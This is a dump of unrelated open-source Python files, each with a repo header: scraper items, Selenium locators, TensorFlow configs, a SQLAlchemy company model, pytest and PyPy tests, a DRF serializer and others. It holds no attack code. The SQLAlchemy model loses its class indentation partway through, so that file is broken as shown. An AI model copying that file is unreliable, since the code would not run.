ibSmaNodeServiceLevel=ibSmaNodeServiceLevel, ibSmaPortVlArbLowCapacity=ibSmaPortVlArbLowCapacity, ibSmaPortInfoTable=ibSmaPortInfoTable, ibSmaPKeyGroup=ibSmaPKeyGroup, ibSmaPortIsAutoMigrateSupported=ibSmaPortIsAutoMigrateSupported, ibSmaRandomLMC=ibSmaRandomLMC, ibSmaNodePortNum=ibSmaNodePortNum, ibSmaNodeSwitchLid=ibSmaNodeSwitchLid, ibSmaExcessBuffOverrunThres=ibSmaExcessBuffOverrunThres, ibSmaNodeCapMask=ibSmaNodeCapMask, ibSmaLedInfo=ibSmaLedInfo, ibSmaPortVirtLaneSupport=ibSmaPortVirtLaneSupport, ibSmaPortPartEnforceInbound=ibSmaPortPartEnforceInbound, ibSmaSmState=ibSmaSmState, ibSmaNodeMethod=ibSmaNodeMethod, ibSmaPortIsTrapSupported=ibSmaPortIsTrapSupported)
# File: scripts/drugRegSpider/items.py (repo: aa989190f363e46d/rcethRegsSpiders, license: MIT)
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class DrugregspiderItem(scrapy.Item):
    # define the fields for your item here like:
    # name = scrapy.Field()

    # Trade name
    name = scrapy.Field()
    # International nonproprietary name (INN)
    mnn = scrapy.Field()
    # Dosage forms
    lForm = scrapy.Field()
    # Manufacturer
    manufacturer = scrapy.Field()
    # Applicant
    invoker = scrapy.Field()
    # Certificate number
    certNum = scrapy.Field()
    # Registration date
    regDtBegin = scrapy.Field()
    # Expiration date
    regDtExpire = scrapy.Field()
    # Originator (original) drug flag
    originality = scrapy.Field()
    # Manuals (instructions for use)
    manuals = scrapy.Field()

    # Files pipeline
    # http://doc.scrapy.org/en/latest/topics/media-pipeline.html#using-the-files-pipeline
    file_urls = scrapy.Field()
    files = scrapy.Field()
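The Field declarations above make DrugregspiderItem a dict-like container that accepts only the declared keys. A self-contained sketch of that behavior, using minimal stand-ins for `scrapy.Item`/`scrapy.Field` so it runs without scrapy installed (the sample values are made up):

```python
class Field(dict):
    """Per-field metadata container, mimicking scrapy.Field."""

class Item(dict):
    """Minimal stand-in for scrapy.Item: only declared fields may be set."""
    fields = {}

    def __init_subclass__(cls):
        # Collect class attributes that are Field instances, like scrapy does.
        cls.fields = {k: v for k, v in vars(cls).items() if isinstance(v, Field)}

    def __setitem__(self, key, value):
        if key not in self.fields:
            raise KeyError(f"{type(self).__name__} does not support field: {key}")
        super().__setitem__(key, value)

class DrugItem(Item):
    name = Field()     # trade name
    certNum = Field()  # certificate number

item = DrugItem()
item['name'] = 'Aspirin'       # declared field: accepted
item['certNum'] = '12/34/567'  # hypothetical value
```

Assigning to an undeclared key (e.g. `item['price'] = 10`) raises `KeyError`, which is also how the real scrapy item surfaces typos in field names early.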
# File: Codewars/Phone_number.py (repo: Gbrvi/Python, license: MIT)
def phone_number(num):
    string = [str(x) for x in num]
    string = ''.join(string)
    return f'({string[:3]}) {string[3:6]}-{string[6:]}'
print(phone_number([1,2,3,4,5,6,7,8,9,0]))
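A couple of assert-style checks make the expected formatting explicit; the function is repeated here in equivalent form so the block runs standalone:

```python
def phone_number(num):
    # Join the ten digits, then slice into (AAA) BBB-CCCC groups.
    digits = ''.join(str(x) for x in num)
    return f'({digits[:3]}) {digits[3:6]}-{digits[6:]}'

# Pin down the expected output for ten-digit inputs.
assert phone_number([1, 2, 3, 4, 5, 6, 7, 8, 9, 0]) == '(123) 456-7890'
assert phone_number(range(10)) == '(012) 345-6789'
```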
# File: python/cloudtik/runtime/hdfs/runtime.py (repo: jerrychenhf/cloudtik, license: Apache-2.0)
import logging
from typing import Any, Dict
from cloudtik.core.node_provider import NodeProvider
from cloudtik.core.runtime import Runtime
from cloudtik.runtime.hdfs.utils import _config_runtime_resources, _with_runtime_environment_variables, \
    _is_runtime_scripts, _get_runnable_command, _get_runtime_processes, _validate_config, \
    _verify_config, _get_runtime_logs, _get_runtime_commands, \
    _get_defaults_config, _get_useful_urls, publish_service_uri
logger = logging.getLogger(__name__)
class HDFSRuntime(Runtime):
    """Implementation for HDFS Runtime"""

    def __init__(self, runtime_config: Dict[str, Any]) -> None:
        Runtime.__init__(self, runtime_config)

    def prepare_config(self, cluster_config: Dict[str, Any]) -> Dict[str, Any]:
        """Prepare runtime specific configurations"""
        return _config_runtime_resources(cluster_config)

    def validate_config(self, cluster_config: Dict[str, Any], provider: NodeProvider):
        """Validate cluster configuration from runtime perspective."""
        _validate_config(cluster_config, provider)

    def verify_config(self, cluster_config: Dict[str, Any], provider: NodeProvider):
        """Verify cluster configuration at the last stage of bootstrap.
        The verification may mean a slow process to check with a server."""
        _verify_config(cluster_config, provider)

    def with_environment_variables(
            self, config: Dict[str, Any], provider: NodeProvider,
            node_id: str) -> Dict[str, Any]:
        """Export necessary runtime environment variables for running node commands.
        For example: {"ENV_NAME": value}
        """
        return _with_runtime_environment_variables(
            self.runtime_config, config=config, provider=provider, node_id=node_id)

    def cluster_booting_completed(
            self, cluster_config: Dict[str, Any], head_node_id: str) -> None:
        publish_service_uri(cluster_config, head_node_id)

    def get_runnable_command(self, target: str):
        """Return the runnable command for the target script.
        For example: ["bash", target]
        """
        if not _is_runtime_scripts(target):
            return None
        return _get_runnable_command(target)

    def get_runtime_commands(self, cluster_config: Dict[str, Any]) -> Dict[str, Any]:
        """Returns a copy of runtime commands to run at different stages"""
        return _get_runtime_commands(self.runtime_config, cluster_config)

    def get_defaults_config(self, cluster_config: Dict[str, Any]) -> Dict[str, Any]:
        """Returns a copy of runtime config"""
        return _get_defaults_config(self.runtime_config, cluster_config)

    def get_useful_urls(self, cluster_head_ip: str):
        return _get_useful_urls(cluster_head_ip)

    @staticmethod
    def get_logs() -> Dict[str, str]:
        """Return a dictionary of name to log paths.
        For example {"server-a": "/tmp/server-a/logs"}
        """
        return _get_runtime_logs()

    @staticmethod
    def get_processes():
        """Return a list of processes for this runtime.
        Format:
        #1 Keyword to filter,
        #2 filter by command (True)/filter by args (False)
        #3 The third element is the process name.
        #4 The fourth element: if "node", the process should be on all nodes; if "head", the process should be on the head node.
        For example
        ["cloudtik_cluster_controller.py", False, "ClusterController", "head"],
        """
        return _get_runtime_processes()
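HDFSRuntime is a thin adapter: each method forwards to a module-level helper from `cloudtik.runtime.hdfs.utils`. A self-contained sketch of the same delegation pattern (the names and the copy-returning helper here are illustrative, not cloudtik's real API):

```python
from typing import Any, Dict

def _get_defaults_config(runtime_config: Dict[str, Any]) -> Dict[str, Any]:
    # Stand-in for a utils helper: hand back a copy so callers cannot
    # mutate the runtime's stored configuration.
    return dict(runtime_config)

class Runtime:
    def __init__(self, runtime_config: Dict[str, Any]) -> None:
        self.runtime_config = runtime_config

class ToyRuntime(Runtime):
    def get_defaults_config(self) -> Dict[str, Any]:
        # The method itself holds no logic; it only delegates.
        return _get_defaults_config(self.runtime_config)

rt = ToyRuntime({"replication": 3})
cfg = rt.get_defaults_config()
cfg["replication"] = 1  # mutates only the returned copy
```

Keeping the logic in free functions lets the same helpers be reused by command-line tooling without instantiating the runtime class.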
# File: locators/create_course_page_locators.py (repo: KKashpovski/test_moodle_project, license: Apache-2.0)
"""Locators for the course creation page."""
from selenium.webdriver.common.by import By
class CreateCourseGeneralLocators:
    FULL_NAME_COURSE = (By.CSS_SELECTOR, "input#id_fullname")
    NAME_COURSE = (By.CSS_SELECTOR, "input#id_shortname")
    COURSE_VISIBILITY = (By.CSS_SELECTOR, "select#id_visible")
    BEGIN_DAY_COURSE = (By.CSS_SELECTOR, "select#id_startdate_day")
    BEGIN_MONTH_COURSE = (By.CSS_SELECTOR, "select#id_startdate_month")
    BEGIN_YEAR_COURSE = (By.CSS_SELECTOR, "select#id_startdate_year")
    END_DAY_COURSE = (By.CSS_SELECTOR, "select#id_enddate_day")
    END_MONTH_COURSE = (By.CSS_SELECTOR, "select#id_enddate_month")
    END_YEAR_COURSE = (By.CSS_SELECTOR, "select#id_enddate_year")
    ID_COURSE = (By.CSS_SELECTOR, "input#id_idnumber")
    SAVE_BUTTON = (By.CSS_SELECTOR, "input#id_saveanddisplay")
    NAVBAR_ITEMS = (By.CLASS_NAME, "breadcrumb-item")
    COURSE_CREATE_HEADER = (By.TAG_NAME, "h1")
class CreateCourseDescriptionLocators:
    DESCRIPTION_FIELD = (By.CSS_SELECTOR, ".editor_atto_content [dir]")
class CreateCourseImagesLocators:
    OPEN_IMAGE_MENU_BUTTON = (
        By.CSS_SELECTOR,
        "a[role='button'] > .fa.fa-file-o.fa-fw.icon",
    )
    DOWNLOAD_FILES_BY_URL = (
        By.CSS_SELECTOR,
        "div:nth-of-type(5) > .nav-link > .fp-repo-name",
    )
    FIELD_FOR_INPUT_URL = (By.CSS_SELECTOR, "input#fileurl")
    DOWNLOAD_BUTTON = (By.CSS_SELECTOR, ".btn.btn-primary.fp-login-submit")
    IMAGE_BUTTON = (By.CSS_SELECTOR, ".fp-reficons2")
    SELECT_IMAGE_BUTTON = (By.CSS_SELECTOR, ".fp-select-confirm.btn")
    GO_TO_ALL_COURSES = (By.CSS_SELECTOR, "ol > li:nth-of-type(2) > a")
    COURSE_INFO_ICON = (
        By.CSS_SELECTOR,
        ".collapsed.coursebox.first.odd a[title='Описание'] > i[title='Описание']",
    )
    COURSE_INFO = (By.CSS_SELECTOR, ".coursebox.first.loaded.odd")
    COURSE_IMAGE = (By.CSS_SELECTOR, ".courseimage>img")
class CreateCourseGroupsLocators:
    GROUPS_DESCRIPTION = (By.CSS_SELECTOR, "#id_groups .ftoggler [role]")
    GROUP_MODE = (By.NAME, "groupmode")
    FORCED_GROUP_MODE = (By.XPATH, "/html//select[@id='id_groupmodeforce']")
class CreateCourseTagsLocators:
    TAGS_DESCRIPTION = (By.CSS_SELECTOR, "fieldset#id_tagshdr a[role='button']")
    TAGS_FOR_COURSE = (
        By.XPATH,
        "/html//div[@id='fitem_id_tags']/div[2]//input[@role='combobox']",
    )
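Each constant above is a `(how, what)` tuple intended to be star-unpacked into `WebDriver.find_element` or an expected-conditions helper. A sketch of that convention with Selenium stubbed out so it runs without a browser (in Selenium, `By.CSS_SELECTOR` is just the string `"css selector"`):

```python
CSS_SELECTOR = "css selector"  # value held by selenium.webdriver.common.by.By.CSS_SELECTOR

# A locator in the same (how, what) shape as the page-object classes above.
SAVE_BUTTON = (CSS_SELECTOR, "input#id_saveanddisplay")

def find_element(by: str, value: str) -> str:
    """Stand-in for WebDriver.find_element(by, value)."""
    return f"<element located by {by}={value!r}>"

# Star-unpack the tuple at the call site, as page-object tests typically do.
element = find_element(*SAVE_BUTTON)
```

With a real driver this reads `driver.find_element(*CreateCourseGeneralLocators.SAVE_BUTTON)`, which keeps the selectors in one place and the test steps free of raw strings.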
# File: official/vision/beta/configs/decoders.py (repo: KiryanovKD/models, license: Apache-2.0)
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Decoders configurations."""
import dataclasses
from typing import List, Optional
# Import libraries
from official.modeling import hyperparams
@dataclasses.dataclass
class Identity(hyperparams.Config):
    """Identity config."""
    pass
@dataclasses.dataclass
class FPN(hyperparams.Config):
    """FPN config."""
    num_filters: int = 256
    fusion_type: str = 'sum'
    use_separable_conv: bool = False
@dataclasses.dataclass
class NASFPN(hyperparams.Config):
    """NASFPN config."""
    num_filters: int = 256
    num_repeats: int = 5
    use_separable_conv: bool = False
@dataclasses.dataclass
class ASPP(hyperparams.Config):
    """ASPP config."""
    level: int = 4
    dilation_rates: List[int] = dataclasses.field(default_factory=list)
    dropout_rate: float = 0.0
    num_filters: int = 256
    use_depthwise_convolution: bool = False
    pool_kernel_size: Optional[List[int]] = None  # Use global average pooling.
    spp_layer_version: str = 'v1'
    output_tensor: bool = False
@dataclasses.dataclass
class Decoder(hyperparams.OneOfConfig):
    """Configuration for decoders.

    Attributes:
        type: 'str', type of decoder to be used, one of the fields below.
        fpn: fpn config.
    """
    type: Optional[str] = None
    fpn: FPN = FPN()
    nasfpn: NASFPN = NASFPN()
    identity: Identity = Identity()
    aspp: ASPP = ASPP()
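`Decoder` follows the one-of pattern of `hyperparams.OneOfConfig`: the `type` field names which sibling config is active, and a `get()` call returns that member. A stdlib-only sketch of that selection logic (the real behavior lives in `official.modeling.hyperparams`; this only mirrors it, under that assumption):

```python
import dataclasses
from typing import Optional

@dataclasses.dataclass
class FPN:
    num_filters: int = 256
    fusion_type: str = 'sum'

@dataclasses.dataclass
class NASFPN:
    num_filters: int = 256
    num_repeats: int = 5

@dataclasses.dataclass
class Decoder:
    # `type` selects which of the sibling fields below is active.
    type: Optional[str] = None
    fpn: FPN = dataclasses.field(default_factory=FPN)
    nasfpn: NASFPN = dataclasses.field(default_factory=NASFPN)

    def get(self):
        # Return the member config named by `type`.
        return getattr(self, self.type)

decoder = Decoder(type='nasfpn')
active = decoder.get()  # the NASFPN instance
```

This lets one config file carry defaults for every decoder while the model-building code only ever reads the selected one.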
# File: 06-04-dealing-with-html.py (repo: habernal/foundations-of-lang-tech-2020, license: Apache-2.0)
from urllib.request import urlopen
raw_html = urlopen('https://en.wikipedia.org/wiki/Python').read()
print(len(raw_html))
print(raw_html[:400])
html = raw_html.decode('utf-8')
print(html[:400])
# File: tests/utils.py (repo: matteobe/loyverse, license: MIT)
"""
Common test utilities
"""
import json
from tests import cassettes_dir
def save_json(response: dict, filename: str) -> None:
    """
    Store the response in dictionary format to a JSON file for later inspection

    Args:
        response (dict): API response in dictionary format (JSON)
        filename (str): name of file to store the response to
    """
    with open(f'{cassettes_dir}/{filename}.json', 'w') as f:
        json.dump(response, f, indent=4, sort_keys=False)
    return None
def error_msg(endpoint: str, msg: str) -> str:
    """
    Format error messages for tests using endpoint:msg structure
    """
    return f'Client.{endpoint}: {msg}.'
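A usage sketch for both helpers. `save_json` above writes into the package-level `cassettes_dir`, so this version takes the directory as an explicit parameter and points it at a temporary directory; everything else matches the originals:

```python
import json
import os
import tempfile

def save_json(response: dict, filename: str, cassettes_dir: str) -> None:
    # Same body as the helper above, with cassettes_dir passed in explicitly.
    with open(f'{cassettes_dir}/{filename}.json', 'w') as f:
        json.dump(response, f, indent=4, sort_keys=False)

def error_msg(endpoint: str, msg: str) -> str:
    return f'Client.{endpoint}: {msg}.'

with tempfile.TemporaryDirectory() as tmp:
    # The payload is a made-up stand-in for an API response.
    save_json({'receipt_number': '1-1001'}, 'receipts', cassettes_dir=tmp)
    with open(os.path.join(tmp, 'receipts.json')) as f:
        loaded = json.load(f)

message = error_msg('receipts', 'unexpected field in response')
```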
# File: vmaig_blog/uwsgi-2.0.14/plugins/fastrouter/uwsgiplugin.py (repo: StanYaha/Blog, license: BSD-3-Clause)
NAME='fastrouter'
CFLAGS = []
LDFLAGS = []
LIBS = []
REQUIRES = ['corerouter']
GCC_LIST = ['fastrouter']
# File: Model/SqlAlchemy/Company/CompanyInfoModel.py (repo: 825477418/XX, license: MIT)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/9/29 15:09
# @Author : Peter
# @Des :
# @File : CompanyInfoModel
# @Software: PyCharm
from XX.Model.SqlAlchemy.BaseModel import *
from sqlalchemy import Column, Integer, String, Text
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
metadata = Base.metadata
class CompanyInfoModel(Base, BaseModel):
    __tablename__ = 'company_info'

    id = Column(Integer, primary_key=True)
    com_id = Column(Integer, index=True)
    web_key = Column(String(255, 'utf8mb4_unicode_ci'))
    logo = Column(String(255, 'utf8mb4_unicode_ci'))
    name = Column(String(255, 'utf8mb4_unicode_ci'))
    tel = Column(String(255, 'utf8mb4_unicode_ci'))
    email = Column(String(255, 'utf8mb4_unicode_ci'))
    web_url = Column(String(255, 'utf8mb4_unicode_ci'))
    Address = Column(String(255, 'utf8mb4_unicode_ci'))
    AnnualReports = Column(String(255, 'utf8mb4_unicode_ci'))
    CreditCode = Column(String(255, 'utf8mb4_unicode_ci'))
    taxpayer_no = Column(String(255, 'utf8mb4_unicode_ci'))
    No = Column(String(255, 'utf8mb4_unicode_ci'))
    organization_no = Column(String(255, 'utf8mb4_unicode_ci'))
    Oper_id = Column(Integer)
    OperName = Column(String(255, 'utf8mb4_unicode_ci'))
    RegistCapi = Column(String(255, 'utf8mb4_unicode_ci'))
    Status = Column(String(255, 'utf8mb4_unicode_ci'))
    StartDate = Column(String(255, 'utf8mb4_unicode_ci'))
    EconKind = Column(String(255, 'utf8mb4_unicode_ci'))
    staff_num = Column(String(255, 'utf8mb4_unicode_ci'))
    TermStart = Column(String(255, 'utf8mb4_unicode_ci'))
    TeamEnd = Column(String(255, 'utf8mb4_unicode_ci'))
    BelongOrg = Column(String(255, 'utf8mb4_unicode_ci'))
    CheckDate = Column(String(255, 'utf8mb4_unicode_ci'))
    en_name = Column(String(255, 'utf8mb4_unicode_ci'))
    register_addr = Column(String(255, 'utf8mb4_unicode_ci'))
    industry_belong = Column(String(255, 'utf8mb4_unicode_ci'))
    used_name = Column(String(255, 'utf8mb4_unicode_ci'))
    location = Column(String(255, 'utf8mb4_unicode_ci'))
    Scope = Column(Text(collation='utf8mb4_unicode_ci'))
    intro = Column(Text(collation='utf8mb4_unicode_ci'))
    EndDate = Column(String(255, 'utf8mb4_unicode_ci'))
    Province = Column(String(50, 'utf8mb4_unicode_ci'))
    Industry = Column(String(255, 'utf8mb4_unicode_ci'))
    ImageUrl = Column(String(255, 'utf8mb4_unicode_ci'))
    OrgNo = Column(String(255, 'utf8mb4_unicode_ci'))
    EnglishName = Column(String(255, 'utf8mb4_unicode_ci'))
    Type = Column(String(255, 'utf8mb4_unicode_ci'))
    Tag = Column(String(255, 'utf8mb4_unicode_ci'))
    Financing = Column(String(255, 'utf8mb4_unicode_ci'))
    DbUpdatedDate = Column(Integer)
    ShortStatus = Column(String(20, 'utf8mb4_unicode_ci'))
    IsExpired = Column(String(5, 'utf8mb4_unicode_ci'))
    DUNSNo = Column(String(25, 'utf8mb4_unicode_ci'))
    TaxNo = Column(String(25, 'utf8mb4_unicode_ci'))
    CbuItem = Column(Text(collation='utf8mb4_unicode_ci'))
    AbuItem = Column(Text(collation='utf8mb4_unicode_ci'))
    OpForm = Column(String(5, 'utf8mb4_unicode_ci'))
RecCap = Column(String(55, 'utf8mb4_unicode_ci'))
Liquidation = Column(String(5, 'utf8mb4_unicode_ci'))
SimpleCancellation = Column(String(5, 'utf8mb4_unicode_ci'))
CompanyStatus = Column(Integer)
HoldingType = Column(String(25, 'utf8mb4_unicode_ci'))
id_del = Column(String(255, 'utf8mb4_unicode_ci'))
create_ts = Column(Integer)
update_ts = Column(Integer)
def __init__(self, *arg, **kw):
self.AbuItem = kw.get("AbuItem", None)
self.Address = kw.get("Address", None)
self.AnnualReports = kw.get("AnnualReports", None)
self.BelongOrg = kw.get("BelongOrg", None)
self.CbuItem = kw.get("CbuItem", None)
self.CheckDate = kw.get("CheckDate", None)
self.CompanyStatus = kw.get("CompanyStatus", None)
self.CreditCode = kw.get("CreditCode", None)
self.DUNSNo = kw.get("DUNSNo", None)
self.DbUpdatedDate = kw.get("DbUpdatedDate", None)
self.EconKind = kw.get("EconKind", None)
self.EndDate = kw.get("EndDate", None)
self.EnglishName = kw.get("EnglishName", None)
self.Financing = kw.get("Financing", None)
self.HoldingType = kw.get("HoldingType", None)
self.ImageUrl = kw.get("ImageUrl", None)
self.Industry = kw.get("Industry", None)
self.IsExpired = kw.get("IsExpired", None)
self.Liquidation = kw.get("Liquidation", None)
self.No = kw.get("No", None)
self.OpForm = kw.get("OpForm", None)
self.Oper_id = kw.get("Oper_id", None)
self.OperName = kw.get("OperName", None)
self.OrgNo = kw.get("OrgNo", None)
self.Province = kw.get("Province", None)
self.RecCap = kw.get("RecCap", None)
self.RegistCapi = kw.get("RegistCapi", None)
self.Scope = kw.get("Scope", None)
self.ShortStatus = kw.get("ShortStatus", None)
self.SimpleCancellation = kw.get("SimpleCancellation", None)
self.StartDate = kw.get("StartDate", None)
self.Status = kw.get("Status", None)
self.Tag = kw.get("Tag", None)
self.TaxNo = kw.get("TaxNo", None)
self.TeamEnd = kw.get("TeamEnd", None)
self.TermStart = kw.get("TermStart", None)
self.Type = kw.get("Type", None)
self.com_id = kw.get("com_id", None)
self.web_key = kw.get("web_key", None)
self.create_ts = kw.get("create_ts", None)
self.email = kw.get("email", None)
self.en_name = kw.get("en_name", None)
self.get = kw.get("get", None)
self.getAll = kw.get("getAll", None)
self.getAllIds = kw.get("getAllIds", None)
self.getByFromId = kw.get("getByFromId", None)
self.getByFromIdAndMod = kw.get("getByFromIdAndMod", None)
self.getByName = kw.get("getByName", None)
self.getColumsByFromIdAndMod = kw.get("getColumsByFromIdAndMod", None)
self.id = kw.get("id", None)
self.id_del = kw.get("id_del", None)
self.industry_belong = kw.get("industry_belong", None)
self.intro = kw.get("intro", None)
self.location = kw.get("location", None)
self.logo = kw.get("logo", None)
self.metadata = kw.get("metadata", None)
self.name = kw.get("name", None)
self.organization_no = kw.get("organization_no", None)
self.register_addr = kw.get("register_addr", None)
self.staff_num = kw.get("staff_num", None)
self.taxpayer_no = kw.get("taxpayer_no", None)
self.tel = kw.get("tel", None)
self.updateId = kw.get("updateId", None)
self.update_ts = kw.get("update_ts", None)
self.used_name = kw.get("used_name", None)
self.web_url = kw.get("web_url", None)
if __name__ == '__main__':
createInitFunction(CompanyInfoModel)
| 46.891892 | 78 | 0.659798 | 877 | 6,940 | 5.036488 | 0.147092 | 0.074711 | 0.181118 | 0.179307 | 0.335069 | 0.335069 | 0.046185 | 0 | 0 | 0 | 0 | 0.042143 | 0.193084 | 6,940 | 147 | 79 | 47.210884 | 0.746607 | 0.022046 | 0 | 0 | 0 | 0 | 0.217257 | 0.003392 | 0 | 0 | 0 | 0 | 0 | 1 | 0.007519 | false | 0 | 0.022556 | 0 | 0.473684 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
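A standalone sketch (not importing the real model, class and field names here are illustrative stand-ins) of the keyword-only initializer pattern `CompanyInfoModel.__init__` uses: every attribute is read from `**kw` and silently defaults to `None` when the key is absent.

```python
# Mimics CompanyInfoModel.__init__: each field comes from **kw with a
# None default, so any subset of fields can be passed at construction.
class KwInitSketch:
    def __init__(self, *arg, **kw):
        self.name = kw.get("name", None)
        self.tel = kw.get("tel", None)
        self.com_id = kw.get("com_id", None)

c = KwInitSketch(name="Acme", com_id=42)
print(c.name)    # Acme
print(c.tel)     # None
print(c.com_id)  # 42
```

One consequence of this pattern worth noting: misspelled keyword arguments are swallowed silently rather than raising a `TypeError`.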
1337838ed34db711f0a7cc200d22dfd85d470b1a | 426 | py | Python | 3_classes/mdsim/tests/test_integrator/test_md_integrator.py | lpwgroup/programming-tutorial | e70a598f2a34bf87bb30f42d56940fe6f9a0e0c9 | [
"BSD-3-Clause"
] | null | null | null | 3_classes/mdsim/tests/test_integrator/test_md_integrator.py | lpwgroup/programming-tutorial | e70a598f2a34bf87bb30f42d56940fe6f9a0e0c9 | [
"BSD-3-Clause"
] | 1 | 2018-08-22T18:26:11.000Z | 2018-08-22T18:26:59.000Z | 3_classes/mdsim/tests/test_integrator/test_md_integrator.py | lpwgroup/programming-tutorial | e70a598f2a34bf87bb30f42d56940fe6f9a0e0c9 | [
"BSD-3-Clause"
] | null | null | null | import pytest
import numpy as np
from mdsim.molecule import Molecule
from mdsim.integrator import MDIntegrator
def test_init():
integrator = MDIntegrator()
assert isinstance(integrator, MDIntegrator)
def test_integrate():
integrator = MDIntegrator()
molecule = Molecule()
# integrate() is not implemented in parent class
with pytest.raises(NotImplementedError):
integrator.integrate(molecule) | 28.4 | 52 | 0.755869 | 46 | 426 | 6.956522 | 0.543478 | 0.20625 | 0.11875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173709 | 426 | 15 | 53 | 28.4 | 0.909091 | 0.107981 | 0 | 0.166667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 1 | 0.166667 | false | 0 | 0.333333 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
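A framework-free sketch of the behavior the test above checks: the parent integrator's `integrate()` raises `NotImplementedError` until a subclass overrides it (the subclass name here is illustrative, not part of mdsim).

```python
# Base class deliberately raises until a concrete integrator overrides it.
class BaseIntegrator:
    def integrate(self, molecule):
        raise NotImplementedError

class VerletIntegrator(BaseIntegrator):
    def integrate(self, molecule):
        return "stepped"

try:
    BaseIntegrator().integrate(None)
except NotImplementedError:
    print("base raises")                   # base raises
print(VerletIntegrator().integrate(None))  # stepped
```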
1337cae31a695ef1fb38e4c6593e999e11530ea8 | 538 | py | Python | teamcat_service/docker_build/target/one_step_build/teamcat/doraemon/api/auth/serializer/user_serializer.py | zhangyin2088/Teamcat | be9be8d7c1e58c8d2d22ab78d25783d9aee4de71 | [
"Apache-2.0"
] | 6 | 2018-11-26T08:42:52.000Z | 2020-06-01T08:33:48.000Z | teamcat_service/doraemon/doraemon/api/auth/serializer/user_serializer.py | zhangyin2088/Teamcat | be9be8d7c1e58c8d2d22ab78d25783d9aee4de71 | [
"Apache-2.0"
] | null | null | null | teamcat_service/doraemon/doraemon/api/auth/serializer/user_serializer.py | zhangyin2088/Teamcat | be9be8d7c1e58c8d2d22ab78d25783d9aee4de71 | [
"Apache-2.0"
] | 1 | 2019-01-22T06:45:36.000Z | 2019-01-22T06:45:36.000Z | #coding=utf-8
'''
Created on 2016-10-12
@author: Administrator
'''
from rest_framework import serializers
from django.contrib.auth.models import User
class UserSerializer(serializers.ModelSerializer):
    name = serializers.SerializerMethodField()

    class Meta:
        model = User
        exclude = ('password', 'first_name', 'last_name', 'is_superuser', 'groups', 'user_permissions')
        read_only_fields = ('id',)
        depth = 2

    def get_name(self, obj):
        return obj.last_name + obj.first_name
| 23.391304 | 96 | 0.665428 | 62 | 538 | 5.612903 | 0.741935 | 0.051724 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023923 | 0.223048 | 538 | 23 | 97 | 23.391304 | 0.808612 | 0.107807 | 0 | 0 | 0 | 0 | 0.133192 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0.090909 | 0.181818 | 0.090909 | 0.636364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
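A hedged, Django-free sketch of how a `SerializerMethodField` named `name` gets resolved: DRF looks up a method called `get_<field>` on the serializer and calls it with the object. `MiniSerializer`, `UserMini`, and `UserLike` are illustrative stand-ins, not DRF classes.

```python
# Minimal stand-in for DRF's SerializerMethodField dispatch: for a field
# called "name", the serializer calls self.get_name(obj).
class MiniSerializer:
    method_fields = ("name",)

    def to_representation(self, obj):
        return {f: getattr(self, "get_" + f)(obj) for f in self.method_fields}

class UserMini(MiniSerializer):
    def get_name(self, obj):
        return obj.last_name + obj.first_name

class UserLike:
    first_name = "Ada"
    last_name = "Lovelace"

print(UserMini().to_representation(UserLike()))  # {'name': 'LovelaceAda'}
```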
133e89d977ba42a62361e677163f098bc9eab746 | 2,503 | py | Python | pypy/module/cpyext/test/test_import.py | pymtl/pypy-pymtl3 | d2f66f87686e48aeb1eecabeaa3de1381a149f2c | [
"Apache-2.0",
"OpenSSL"
] | 1 | 2021-06-02T23:02:09.000Z | 2021-06-02T23:02:09.000Z | pypy/module/cpyext/test/test_import.py | pymtl/pypy-pymtl3 | d2f66f87686e48aeb1eecabeaa3de1381a149f2c | [
"Apache-2.0",
"OpenSSL"
] | 1 | 2021-03-30T18:08:41.000Z | 2021-03-30T18:08:41.000Z | pypy/module/cpyext/test/test_import.py | pymtl/pypy-pymtl3 | d2f66f87686e48aeb1eecabeaa3de1381a149f2c | [
"Apache-2.0",
"OpenSSL"
] | null | null | null | from pypy.module.cpyext.test.test_api import BaseApiTest
from pypy.module.cpyext.test.test_cpyext import AppTestCpythonExtensionBase
from pypy.module.cpyext.import_ import *
from pypy.module.cpyext.import_ import (
_PyImport_AcquireLock, _PyImport_ReleaseLock)
from rpython.rtyper.lltypesystem import rffi
class TestImport(BaseApiTest):
def test_import(self, space):
stat = PyImport_Import(space, space.wrap("stat"))
assert stat
assert space.getattr(stat, space.wrap("S_IMODE"))
def test_addmodule(self, space):
with rffi.scoped_str2charp("sys") as modname:
w_sys = PyImport_AddModule(space, modname)
assert w_sys is space.sys
with rffi.scoped_str2charp("foobar") as modname:
w_foobar = PyImport_AddModule(space, modname)
assert space.text_w(space.getattr(w_foobar,
space.wrap('__name__'))) == 'foobar'
def test_getmoduledict(self, space, api):
testmod = "imghdr"
